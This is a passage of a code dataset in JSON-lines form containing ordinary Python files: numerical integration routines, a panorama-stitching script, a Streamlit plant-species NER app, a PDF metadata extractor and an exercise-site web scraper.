logging.info('Logging: Items total prices is same as Total products prices in Cart Summary page')\n\n driver.close()\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kastala/WebstoreLogin_python","sub_path":"cart_order_files/search_addtocart.py","file_name":"search_addtocart.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29942676289","text":"import numpy as np\n\n\n''' ************* Simpson's Method ************* '''\ndef simpson(function, a, b):\n '''\n Overview:\n Here, we interpolate the function with a parabola that has been\n generically integrated. Conditions of the problem will then be\n substituted for a numerical solution.\n \n Inputs:\n -> 'function' is the curve we wish to integrate.\n -> 'a' and 'b' are the endpoints of the interval we will integrate through.\n \n Outputs:\n -> 'area,' the approximation of the integral of function over the given\n interval.\n '''\n #--------------------------------#\n \n # The midpoint of the interval:\n midpt = a + (b-a)/2\n \n # 'h' is the difference between the endpoint of the interval, 'b,' and its\n # midpoint.\n h = b - midpt\n \n # Simpson's Rule; we estimate the integral of our function using the\n # integral of a polynomial interpolant;\n # Functional evaluations give y0, y1, and y2, respectively.\n area = (h/3) * (function(a) + 4*function(midpt) + function(b))\n \n return area\n \n\n''' ************* Composite Simpson's Method ************* '''\ndef compositeSimpson(function, n, a, b):\n '''\n Description:\n The approach of this implementation is to split the interval up into\n smaller subintervals and applying Simpson's Rule to each.\n\n Inputs:\n -> 'function' is the curve we wish to integrate;\n -> 'n' is the number of intervals we want integrate over; effectively, the\n number of steps;\n -> 'a' and 'b' are the endpoints of the interval we will integrate through.\n \n Outputs:\n -> 'area,' the approximation of the integral of function over the given\n interval.\n '''\n #--------------------------------#\n\n # Set of endpoints and midpoints defining each of n subintervals\n x = np.linspace(a,b,n+1)\n\n # The width of each subinterval.\n h = x[1]-x[0]\n\n # Creating a scaling array so that we can multiply through by f\n # evaluated at each point with its necessary scaler (i.e 1 for the\n # endpoints, 2 for the even midpoints, and 4 for the odd endpoints).\n # This will streamline the summation.\n c = 2*np.ones(n+1)\n c[0], c[-1] = 1.0, 1.0\n\n for i in range(1,len(c)-1):\n if i % 2 == 1:\n c[i] = 4\n\n # Computing area by summing over all scaled function evaluations.\n area = (h/3) * np.sum(c*function(x))\n\n return area\n\n\n''' ************* Adaptive Quadrature (Simpson's) ************* '''\ndef adaptiveSimpson(fxn, a, b, tol=1e-12, Sab=0.0, recursion_counter=0):\n '''\n Description:\n Similar to composite Simpson's method, but here we The approach of this\n implementation is to subdivide intervals and apply the composite method\n to nested intervals until the total error reaches a set ceiling.\n\n Inputs:\n -> 'fxn' is the function we are integrating.\n -> 'a' and 'b' are the endpoints of the interval we will integrate across.\n -> Stopping Conditions: 'tol' gives the maximum error we are willing to\n accept, and 'recursion_counter' counts number of recursions (cap at 20).\n -> Sab is the value of Simpson's Method on the interval of [a,b] we are\n currently working on.\n\n Outputs:\n -> Total sum, 's_ac + s_cb' over specified interval, or recursive\n subdivisions\n \n \n ** 'S_ab' and 'recursion_counter' are only passed internally **\n '''\n #--------------------------------#\n\n # Finding midpoint of the current interval [a,b].\n c = (a+b)/2\n\n # Find s_ab, sum over the current interval, [a,b], using Simpson's Method...\n s_ab = simpson(fxn, a, b)\n\n # ... And for the intervals [a, c] and [c, b], where 'c' is the midpoint.\n s_ac = simpson(fxn, a, c)\n\n s_cb = simpson(fxn, c, b)\n\n # Throwing value error if maximum recursion depth is reached;\n # Max = 20 since that has the potential produce 2^20 (about a million)\n # function calls.\n if recursion_counter == 20:\n raise ValueError('Recursion depth too low. Either choose larger error \\\n tolerance or set lower depth.')\n\n # Checking devation of sums of subintervals from sum over entire interval.\n if (np.abs(s_ab - s_ac - s_cb) < 10*tol):\n return s_ac + s_cb # If within tolerance, accept the current sum.\n else:\n return adaptiveSimpson(fxn, c, b, tol/2, s_cb, recursion_counter+1) +\\\n adaptiveSimpson(fxn, a, c, tol/2, s_ac, recursion_counter+1)\n\n\n''' ************* Gaussian Quadrature ************* '''\ndef gaussQuad(function, n, a=-1, b=1):\n '''\n Description:\n\n Inputs:\n -> 'function' is the function we are integrating.\n -> 'n' is the number of nodes (roots of Legendre polynomial p_n(x)).\n -> 'a' and 'b' are the endpoints of the interval we will integrate across.\n -1 and 1 are the defaults.\n\n Output:\n -> 'result' is the value of the integral of 'function' on the\n interval [a,b].\n '''\n #--------------------------------#\n\n # Finding the roots and weights: Passing our degree, n, outputs sample\n # nodes and corresponding weights 'wts.'\n nodes, wts = np.polynomial.legendre.leggauss(n)\n\n # Since Gaussian Quadrature was developed for the interval [-1.1], we\n # perform a transformation to [a,b]. (Note that this changes nothing if\n # [a,b] = [-1,1].)\n midpt = (a+b)/2.0\n halfWidth = (b-a)/2.0\n nodes = halfWidth*nodes + midpt\n\n # Evaluating and storing function evaluations for nodes.\n fNodes = function(nodes)\n\n # Computing the inner product.\n result = np.dot(wts, fNodes)\n\n # Multiply by the halflength for the interval transformation. (If no\n # transformation, 'result*halflength = result.')\n return result*halfWidth\n","repo_name":"leoglonz/Numerical_Analysis_Base","sub_path":"numerics5_lonzarich.py","file_name":"numerics5_lonzarich.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26366337513","text":"import matplotlib.pyplot as plt\nimport skimage.io as skio\nfrom skimage.transform import warp\nfrom scipy import misc\nimport numpy as np\nimport sys\nimport harris\nimport math\nimport random\n\n\ndef computeHomographyMatrix(imA_points, imB_points):\n\tA = computeAMatrix(imA_points, imB_points)\n\tb = computeBVector(imB_points)\n\t\n\tresult = np.linalg.lstsq(A, np.transpose(b))[0]\n\treturn formatHMatrix(result)\n\ndef computeAMatrix(imA_points, imB_points):\n\tmatrix_string = \"\"\n\tfor i in range(len(imA_points)):\n\t\tx, y = imA_points[i][0], imA_points[i][1]\n\t\tx_1, y_1 = imB_points[i][0], imB_points[i][1] \n\t\tif i + 1 == len(imA_points):\n\t\t\tvalue = \"{} {} 1 0 0 0 {} {};\".format(x, y, -1 * x * x_1, -1 * y * x_1) +\"0 0 0 {} {} 1 {} {}\".format(x, y, -1 * x * y_1, -1 * y * y_1)\n\t\t\tmatrix_string += value\n\t\telse:\n\t\t\tvalue = \"{} {} 1 0 0 0 {} {};\".format(x, y, -1 * x * x_1, -1 * y * x_1) +\"0 0 0 {} {} 1 {} {};\".format(x, y, -1 *x * y_1, -1 * y * y_1)\n\t\t\tmatrix_string += value\n\n\treturn np.matrix(matrix_string)\n\ndef computeBVector(imB_points):\n\tvector_string = \"\"\n\tfor i in range(len(imB_points)):\n\t\tx, y = imB_points[i][0], imB_points[i][1]\n\t\tvector_string += \" {} {} \".format(x, y)\n\n\treturn np.matrix(vector_string)\n\ndef formatHMatrix(result):\n\tH = np.matrix(\"{} {} {};\".format(result[0], result[1], result[2])\n\t\t\t\t +\"{} {} {};\".format(result[3], result[4], result[5])\n\t\t\t\t +\"{} {} 1\".format(result[6], result[7]))\n\treturn H\n\ndef ANMS(points, eps, H):\n\tradius_values = {}\n\tfor center in points:\n\t\tH_i = H[center[0], center[1]]\n\t\tinterest_points = []\n\t\tfor point in points:\n\t\t\tH_j = H[point[0], point[1]]\n\t\t\tif H_i < (eps * H_j):\n\t\t\t\tinterest_points.append(point)\n\t\tif len(interest_points) > 0:\n\t\t\tradius_values[center] = np.amin(harris.dist2(np.array([center]), np.array(interest_points)))\n\tradius_values = sorted((value, key) for (key, value) in radius_values.items())[::-1]\n\t\n\ttop_500 = [[], []]\n\tfor i in range(500):\n\t\ttop_500[0].append(radius_values[i][1][0])\n\t\ttop_500[1].append(radius_values[i][1][1])\n\n\treturn top_500\n\ndef find_descriptors(im, points):\n\tresults = {}\n\tpatch_size = 40\n\tfor point in points:\n\t\tcorner_left_x = point[0] - 20\n\t\tcorner_left_y = point[1] - 20\n\t\tsample_patch = np.zeros((40, 40))\n\t\tfor i in range(patch_size):\n\t\t\tfor j in range(patch_size):\n\t\t\t\tpixel = im[corner_left_x + i][corner_left_y + j]\n\t\t\t\tsample_patch[i][j] = pixel\n\n\t\tsubsample_patch = misc.imresize(sample_patch, (8, 8))\n\n\t\tmean = np.mean(subsample_patch)\n\t\tstd = np.std(subsample_patch)\n\t\tnormalized_patch = (subsample_patch - mean)/std\n\n\t\tresults[point] = np.reshape(normalized_patch, (1, 64))\n\treturn results\n\ndef feature_match(desc_imA, desc_imB):\n\tresults = {}\n\tfor point_A, vector_A in desc_imA.items():\n\t\tdists = {}\n\t\tfor point_B, vector_B in desc_imB.items():\n\t\t\tdists[point_B] = harris.dist2(vector_A, vector_B)[0][0]\n\t\tdists = sorted((value, key) for (key, value) in dists.items())\n\n\t\tif dists[0][0]/dists[1][0] < .3:\n\t\t\tresults[point_A] = dists[0][1]\n\treturn results\n\ndef RANSAC(matched_points):\n\tpoints_A = list(matched_points.keys())\n\tpoints_B = list(matched_points.values())\n\tresults = {}\n\tsub_points = random.sample(range(1, len(points_A)), 4)\n\tsubpoints_A = np.array([points_A[sub_points[0]], points_A[sub_points[1]], points_A[sub_points[2]], points_A[sub_points[3]]])\n\tsubpoints_B = np.array([points_B[sub_points[0]], points_B[sub_points[1]], points_B[sub_points[2]], points_B[sub_points[3]]])\n\n\tH = computeHomographyMatrix(subpoints_A, subpoints_B)\n\tb = np.array(points_B)\n\n\terror = np.dot(H, np.transpose(np.hstack((points_A, np.ones((len(points_A), 1))))))\t\n\tA = np.zeros_like(error)\n\tfor i in range(3):\n\t\tA[i, :] = error[i, :] /error[2, :]\n\n\tA = np.transpose(A)[:,:2]\n\tval_1 = (A[:,0] - b[:,0])**2\n\tval_2 = (A[:,1] - b[:,1])**2\n\tsqrd_err = np.sqrt(val_1 + val_2)\n\n\tfor i in range(len(sqrd_err)):\n\t\tif sqrd_err[i] < 0.5:\n\t\t\tresults[points_A[i]] = points_B[i]\n\treturn results\n\ndef linearBlend(imA, imB, weight):\n\theight, width = imA.shape[0], imA.shape[1]\n\tblendedIm = np.zeros((imA.shape))\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\tif np.sum(imA[y, x, :]) != 0.0 and np.sum(imB[y, x, :]) != 0.0:\n\t\t\t\tblendedIm[y, x, :] = imA[y, x, :] * (1 - weight) + imB[y, x, :] * weight\n\t\t\telse:\n\t\t\t\tblendedIm[y, x, :] = imA[y, x, :] + imB[y, x, :]\n\n\treturn np.clip(blendedIm, 0, 1)\n\ndef main():\n\tim_left = misc.imread(\"./images/thames1.jpg\")/255.\n\tim_left_bw = misc.imread(\"./images/thames1.jpg\", flatten = True)/255.\n\tim_right = misc.imread(\"./images/thames2.jpg\")/255.\n\tim_right_bw = misc.imread(\"./images/thames2.jpg\", flatten = True)/255.\n\n\tH_left, coors_left = harris.get_harris_corners(im_left_bw)\n\tH_right, coors_right = harris.get_harris_corners(im_right_bw)\n\n\tplt.imshow(im_left)\n\tplt.scatter(coors_left[1], coors_left[0], s = 40)\n\tplt.show()\n\n\tplt.imshow(im_right)\n\tplt.scatter(coors_right[1], coors_right[0], s = 40)\n\tplt.show()\n\n\tpoints_left = []\n\tANMS_points_left = []\n\tfor i in range(len(coors_left[0])):\n\t\tpoints_left.append((coors_left[0][i], coors_left[1][i]))\n\tANMS_coors_left = ANMS(points_left, .9, H_left)\n\n\tpoints_right = []\n\tANMS_points_right = []\n\tfor i in range(len(coors_right[0])):\n\t\tpoints_right.append((coors_right[0][i], coors_right[1][i]))\n\tANMS_coors_right = ANMS(points_right, .9, H_right)\n\n\tplt.imshow(im_left)\n\tplt.scatter(ANMS_coors_left[1], ANMS_coors_left[0], s = 40)\n\tplt.show()\n\n\tplt.imshow(im_right)\n\tplt.scatter(ANMS_coors_right[1], ANMS_coors_right[0], s = 40)\n\tplt.show()\n\n\tfor i in range(len(ANMS_coors_left[0])):\n\t\tANMS_points_left.append((ANMS_coors_left[0][i], ANMS_coors_left[1][i]))\n\tdescriptors_left = find_descriptors(im_left_bw, ANMS_points_left)\n\n\tfor i in range(len(ANMS_coors_right[0])):\n\t\tANMS_points_right.append((ANMS_coors_right[0][i], ANMS_coors_right[1][i]))\n\tdescriptors_right = find_descriptors(im_right_bw, ANMS_points_right)\n\n\tmatched_features = feature_match(descriptors_left, descriptors_right)\n\n\tmatched_left_points = list(matched_features.keys())\n\tplt.imshow(im_left)\n\tplt.scatter([x for (y, x) in matched_left_points], [y for (y, x) in matched_left_points], s = 40)\n\tplt.show()\n\n\tmatched_right_points = list(matched_features.values())\n\tplt.imshow(im_right)\n\tplt.scatter([x for (y, x) in matched_right_points], [y for (y, x) in matched_right_points], s = 40)\n\tplt.show()\n\n\tRANSAC_points = {}\n\tfor i in range(500):\n\t\tpoints = RANSAC(matched_features)\n\t\tif len(points) > len(RANSAC_points):\n\t\t\tRANSAC_points = points\n\n\tH_L = computeHomographyMatrix(list(RANSAC_points.keys()), list(RANSAC_points.values()))\n\tH_R = computeHomographyMatrix(list(RANSAC_points.keys()), list(RANSAC_points.values()))\n\n\twarpedImL = warp(im_left, np.linalg.inv(H_L), output_shape = (im_left.shape[0] * 1.5, im_left.shape[1] * 3))\n\twarpedImR = warp(im_right, np.linalg.inv(H_R), output_shape = (im_left.shape[0] * 1.5, im_left.shape[1] * 3))\n\n\tresult = linearBlend(warpedImL, warpedImR, weight = .5)\n\n\tmisc.imsave(\"warpedL.png\", warpedImL)\n\tmisc.imsave(\"warpedR.png\", warpedImR)\n\tmisc.imsave(\"warped_result.png\", result)\n\nmain()\n\t","repo_name":"Zumbalamambo/cs194-26","sub_path":"project6/part_B/karl_cempron_code_proj6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35777654760","text":"import streamlit as st\nimport spacy\nfrom spacy import displacy\nimport pandas as pd\nimport csv \nimport re\n\ndef app():\n\n html_temp = \"\"\"\n
\n \n
\n \"\"\"\n\n st.markdown(\"\"\"\n ## Un modèle NER pour l'extraction des espèces de plantes\n \"\"\")\n st.markdown(html_temp.format(\"rgba(55, 53, 47, 0.16)\"),unsafe_allow_html=True)\n st.markdown(\"\"\"\n Dans la botanique, chaque espèce est doté d'un nom binomial qui se compose du nom scientifique du genre et d'une épithète spécifique qui décrit l'espèce. \n Ce modèle permet d'extraire les noms d'espèces botaniques à partir de description textuelle.\n \"\"\")\n # st.warning(\"Dans la botanique, chaque espèce est doté d'un nom binomial qui se compose du nom scientifique du genre et d'une épithète spécifique qui décrit l'espèce. Ce modèle permet d'extraire les noms d'espèces botaniques à partir de description textuelle.\")\n st.markdown(html_temp.format(\"rgba(55, 53, 47, 0.16)\"),unsafe_allow_html=True)\n \n with st.sidebar:\n # model versions in sidebar\n choices = {\n 'Modèle v2 (2425 data rows)': './ner-models/ner-species-model-close-recent',\n 'Modèle v1 (1449 data rows)': './ner-models/ner-species-model-recent'\n }\n model_choice = st.selectbox('Version du modèle NER', choices.keys())\n\n \n # loading model\n nlp = spacy.load(choices[model_choice])\n # defaul input text\n example_text = \"Oxera subverticillata est une liane robuste de forêt dense humide, largement répartie du centre au nord de la Grande Terre. Espèce assez commune avec une zone d'occurrence (EOO) de 3651 km² et une zone d'occupation de 100 km², O. subverticillata est évalué en Préoccupation Mineure (LC).\"\n # input field\n text = st.text_area(\"Entrer du texte ici\",example_text)\n # html wrapper to visualize output\n HTML_WRAPPER = \"\"\"
{}
\"\"\"\n if text:\n # feed input text to model\n doc = nlp(text)\n # ruse displacy to visualize the output\n html = displacy.render(doc,style=\"ent\")\n html = html.replace(\"\\n\\n\",\"\\n\")\n with st.expander(\"Affichage NER\"):\n st.write(HTML_WRAPPER.format(html),unsafe_allow_html=True)\n\n with st.expander(\"Etendre l'ensemble de données\"):\n st.markdown(\"\"\"\n ### Améliorer le modèle: Etendre l'ensemble de données\n \"\"\")\n st.warning(\"Pour étendre l'ensemble de données d'entraînement, l'utilisateur peut enregistrer le texte d'entrée avec ses entités nommées, présentes et manquantes, de type ESPECE.\")\n\n # extracted named entities\n present_named_entities = [e.text for e in doc.ents]\n\n # str_present_named_entities = ', '.join(present_named_entities)\n # named_entities = st.text_input('Ajouter les entités nommées manquantes en les séparant par une virgule', str_present_named_entities)\n \n # extract ptential named entities with regex\n r = '([A-Z][a-z]+[ ][a-z]{3,}|[A-Z][.][ ][a-z]{3,})'\n match = re.findall(r, text)\n named_entities = st.multiselect('Ajouter les entités nommées manquantes', match, present_named_entities)\n named_entities = ', '.join(named_entities)\n # data row to add\n fields = [text, named_entities]\n # read local csv file\n r = pd.read_csv('./data/data.csv')\n if st.button('Ajouter comme ligne de données'):\n with open('./data/data.csv', 'a', encoding='utf-8', newline='') as f:\n # write to csv file (append mode)\n writer = csv.writer(f, delimiter=',', lineterminator='\\n')\n writer.writerow(fields)\n # display data\n r = pd.read_csv('./data/data.csv')\n st.table(r)\n\n","repo_name":"nainiayoub/plant-species-ner","sub_path":"pages/especes.py","file_name":"especes.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32297209168","text":"\n\nfrom PyPDF2 import PdfReader\n\ndef extract_information(pdf_path):\n with open(pdf_path, 'rb') as f:\n pdf = PdfReader(f)\n information = pdf.metadata\n number_of_pages = len(pdf.pages)\n\n return {\n 'Author': information.author,\n 'Creator': information.creator,\n 'Producer': information.producer,\n 'Subject': information.subject,\n 'Title': information.title,\n 'Number of pages': number_of_pages\n }","repo_name":"Sawe22/pdfMetaDataExtractor","sub_path":"pdf_metadata_extractor.py","file_name":"pdf_metadata_extractor.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38084660629","text":"import requests\nimport re\nimport sys \nimport os\nimport csv\nfrom json import dumps\nfrom bs4 import BeautifulSoup\n\nmyfile = open('sortedLinks.txt', 'r')\nLinks=myfile.readline().split(\",\")\nDataList=[]\nOtherLinks=[]\ni=0\n# url = \"https://exrx.net/WeightExercises/Sternocleidomastoid/CBNeckFlxBelt\"\n# url1=\"https://exrx.net/Stretches/ChestGeneral/BehindHead\"\n# url2='https://exrx.net/WeightExercises/Supinators/LVSeatedSupination'\n# url3='https://exrx.net/WeightExercises/ErectorSpinae/BBStraightLegDeadlift'\n# url4='https://exrx.net/Stretches/ErectorSpinae/Cat'\n\n\nfor data in Links:\n List1=[]\n i=i+1\n if(i>=1501):\n data1=data.replace(\"'\", \"\")\n r = requests.get(data1)\n soup = BeautifulSoup(r.content, 'html.parser')\n mainHeading=soup.find('h1',class_='page-title')\n try:\n subHeading=mainHeading.find_next('h2')\n if(subHeading==None):\n continue\n elif(subHeading.get_text()==\"Classification\"):\n List1.append(data1)\n List1.append(\"Exercise Name:\")\n List1.append(mainHeading.get_text())\n List1.append(subHeading.get_text())\n tableHeading1=subHeading.find_next('strong')\n List1.append(tableHeading1.get_text())\n \n # print(mydata)\n tableData1=tableHeading1.find_next('td')\n tableDataLink1=tableData1.find_all('a')\n if(len(tableDataLink1)==3):\n List1.append(tableDataLink1[0].get_text())\n tableHeading2=tableHeading1.find_next('strong')\n List1.append(tableHeading2.get_text())\n List1.append(tableDataLink1[1].get_text())\n tableHeading3=tableHeading2.find_next('strong')\n List1.append(tableHeading3.get_text())\n List1.append(tableDataLink1[2].get_text())\n elif(len(tableDataLink1)==4):\n data1=tableDataLink1[0].get_text()+\" or \"+tableDataLink1[1].get_text()\n List1.append(data1)\n tableHeading2=tableHeading1.find_next('strong')\n List1.append(tableHeading2.get_text())\n List1.append(tableDataLink1[2].get_text())\n tableHeading3=tableHeading2.find_next('strong')\n List1.append(tableHeading3.get_text())\n List1.append(tableDataLink1[3].get_text())\n else:\n tableData1=tableHeading1.find_next('td')\n mydata=str(tableHeading1.find_next('td'))\n mydata=re.split('

|||

|

|

||||||',mydata)\n for datainloop in mydata:\n if(datainloop==''):\n continue\n elif(datainloop[:7]==' width='):\n continue\n elif(datainloop[:8]==' height='):\n continue\n elif(datainloop[:6]==\" href=\"):\n continue\n else:\n List1.append(datainloop)\n subHeading=tableData1.find_next('h2')\n List1.append(subHeading.get_text())\n Heading1=subHeading.find_next('strong')\n List1.append(Heading1.get_text())\n paragraph1=str(Heading1.find_next('p'))\n paragraph1=re.split('

|||

|

|

||',paragraph1)\n ListData1=\"\"\n for check in paragraph1:\n if(check=='Execution'):\n break\n elif(check[:6]==\" href=\"):\n continue\n else:\n ListData1=ListData1+check\n \n List1.append(\" \".join(ListData1.split( )))\n Heading2=Heading1.find_next('strong')\n List1.append(Heading2.get_text())\n paragraph2=str(Heading2.find_next('p'))\n paragraph2=re.split('

|||

|

|

||',paragraph2)\n ListData2=\"\"\n for check1 in paragraph2:\n if(check1=='Comments'):\n break\n elif(check1[:6]==\" href=\"):\n continue\n else:\n ListData2=ListData2+check1\n \n List1.append(\" \".join(ListData2.split( )))\n subHeading1=subHeading.find_next('h2')\n List1.append(subHeading1.get_text())\n paragraph3=str(subHeading1.find_next('p'))\n paragraphstring=subHeading1.find_next('p')\n paragraph4=str(paragraphstring.find_next('div'))\n # print(paragraph4)\n paragraph5=paragraph3+paragraph4\n paragraph5=re.split('

|||

|

|

|||
    |
  • |
||',paragraph5)\n ListData3=\"\"\n for check2 in paragraph5:\n if(check2=='Muscles'):\n break\n elif(check2=='Force (Articulation)'):\n OtherLinks.append(data1)\n break\n elif(check2[:6]==\" href=\"):\n continue\n elif(check2[:5]==\" data\"):\n continue\n # elif(check2[:7]==\" class=\"):\n # continue\n else:\n ListData3=ListData3+\" \"+check2\n List1.append(\" \".join(ListData3.split( )))\n try:\n subHeading2=subHeading1.find_next('h2')\n List1.append(subHeading2.get_text())\n Heading3=subHeading2.find_next('strong')\n List1.append(Heading3.get_text())\n ListItem1=Heading3.find_next('ul')\n ListItemString=str(Heading3.find_next('ul'))\n ListItemString=re.split('

|

|